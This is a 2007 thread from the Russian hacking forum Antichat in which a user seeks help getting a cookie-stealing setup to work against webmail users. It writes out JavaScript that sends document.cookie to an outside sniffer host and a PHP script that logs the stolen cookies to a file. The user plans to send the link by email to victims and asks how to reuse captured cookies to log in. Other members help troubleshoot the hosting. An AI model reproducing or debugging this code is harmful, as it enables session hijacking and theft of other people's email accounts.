Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   на счет перехвата cookies. что я не так делаю? (https://forum.antichat.xyz/showthread.php?t=44785)

Miixxa 19.07.2007 12:27

на счет перехвата cookies. что я не так делаю?
 
вообщем у меня вопрос на счет перехвата cookies, можете мне объяснить, что я не так делаю?
вот есть скажем к примеру:
1. лог сниффера http://hackedpro.org/tools/sniff/log.php
2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif

начала с того что просто тупо в браузере ввел:
http://hackedpro.org/tools/sniff/s.gif?document.cookie

в логе посмотрел, получил инфу кроме моего cookies

далее создал файл с раширением html в котором:
<script>
img = new Image();
img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
</script>

запустил его, эффект тот же (все кроме cookies).

Далее разместил на сайте www.miixxa.narod.ru
2 файла:
первый php-script.php в котором:
<?
$query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
$fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); } //после записи закрыли файл.
else {
echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
}
?>

и второй файл cookies.txt

Создал третий файл 1.html в котором:

<script>
img = new Image();
img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
</script>

запустил этот файл, проверил cookies.txt - ничего.

Что я не так делаю? можете помочь?

Piflit 19.07.2007 12:38

Цитата:

Сообщение от Miixxa
начала с того что просто тупо в браузере ввел...

ты с полом все-таки определись))

1.php и php-script.php - разные названия одного скрипта, а они должны совпадать =)

Miixxa 19.07.2007 12:44

отредактировал, по именам фалов все ок, просто здесь ошибься.... Жду помощи в чем моя ошибка...

n3m0 19.07.2007 12:50

На НАРОД.Ру вроде нету поддержки Php

Y.Dmitriy 19.07.2007 12:51

Это бред какой-то... почитай в манах как это делать(там все написано!), попробуй на себе...

Miixxa 19.07.2007 12:55

да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?

Piflit 19.07.2007 12:57

Цитата:

Сообщение от Miixxa
да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?

хостера тебе надо изменить

NOmeR1 19.07.2007 12:59

Цитата:

Сообщение от Miixxa
да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?

поменяй хостинг, на котором лежит php-script.php, на любой с поддержкой PHP (tulpar.net, fatal.ru, holm.ru, 6te.net......)

Miixxa 19.07.2007 13:02

т.е. запуская файл 1.html я краду кукесы с народа.ру? а если разместить данный файл также на народе а в мыле адресу вставить ссылку на него, то кукесы опять с народа будут?

Y.Dmitriy 19.07.2007 13:03

ДА НЕТ НА НАРОДЕ ИНТЕРПРИТАТОРА ПХП ФАЙЛОВ... там только статический файлы .html, .xhtml и тд... тебе нужон хостинг с поддержкой ПХП! удачи!

Miixxa 19.07.2007 13:05

т.е. поменяю хостера, а остальные действия верны и содержимое файлов?

Miixxa 19.07.2007 13:06

а практика? :)

Miixxa 19.07.2007 13:09

а document.cookie на 'document.cookie' менять не надо?

Miixxa 19.07.2007 13:14

Цитата:

Сообщение от invlose
-10

даже елси ты поменяешь хостин
даже если ты снимешь !свои! куки

от этого не будет толка Потому что следующий вопрос будет почему приходят куки не от почты или еще от чего-нибудь)скорее всего или подобного рода

их задать можно будет? :)

Miixxa 19.07.2007 14:16

я же патыюсь сделать что-то и спрашиваю в чем ошибка... что здесь плохого? можно просто ответить что лень объяснять и все, зачем лишние слова?

Miixxa 19.07.2007 14:28

все тоже самое я проделал на www.siteburg.com
в файл cookies.txt не происходит записей, может все же ошибка есть в другом?

Miixxa 19.07.2007 14:33

Цитата:

Сообщение от invlose
зачем лишние слова?
Ладно скажу по делу.
Человеку который пытается добиться результата без каких-либо необходимых усилий к получению нужной информации(открытой!) помогать желания нет.
Возникает лишь вопрос,зачем он этим занялся?
Ачат просто кишит статьями для навичков,спрашивается зачем???????если они не способны их даже прочитать,про осмыслить уже не говорю.
Надеюсь доступно объяснил.


#много опечаток,все наверно не исправил

объяснил доступно. Спасибо!

ch[@]ch 19.07.2007 14:47

человек попросил о помощи....вы ему "помогли"....если не хотите так не надо тут писать!!!или дайте совет!и ещё на ачате статьи для новчиков старые как моя бабушка....и с помощю статьей нельзя практикаваться....

Я бы посоветовал тебе www.jino-net.ru

Miixxa 19.07.2007 21:25

Еще раз всем привет. Сделал все как мне все советовали. Поменял хост с поддержкой пхп, цги. В файл cookies.txt изменения не вносяться, у файла с данными:
<script>
img = new Image();
img.src = "http://www.ххх.ххх.ru/php-script.php?com="+document.cookie;
</script>

должно быть расширение .html ? или .js?

далее скачал с kanick.ru/sniffer сниффер, закинул на сайт, но когда запускаю файл html с данными:

<script>
img = new Image();
img.src = "http://www.ххх.ххх.ru/s.gif?"+document.cookie;
</script>

То в логе сниффера есть IP, строка брузера, а кукесов нет (
При таком варианте: http://www.ххх.ххх.ru/s.gif?document.cookie в логе в строке QUERY вместо данных кукес надпись "document.cookie"
блин читал на форуме, в поисковиках об этом. Ничего не нашел.
Может поможете мне в последний раз? А?

Miixxa 19.07.2007 21:40

Invlose, можем пообщаться по асе? 352973306

Miixxa 19.07.2007 21:52

все! получилось... :) только как все и догадывались задаю еще один вопрос... с помощью чего можно применить кукисы для входа на страницу с которой я их получил?

Miixxa 19.07.2007 22:50

эх, зря обрадовался.... не получилось... вообщем этот скрипт:
<script>
img = new Image();
img.src = "http://www.ххх.ххх.ru/s.gif?"+document.cookie;
</script>
у меня в файле index.html на хостинге
я посылаю письмо и вкладываю в него ссылку, потом открываю письмо, кликаю ссылку. проверяю лог, кукесов нет.
что не так? извините, что так часто спрашиваю, просто хочу разобраться..

Nightmarе 20.07.2007 20:50

Лучший хостинг ИМХО jino-net.ru


Время: 21:18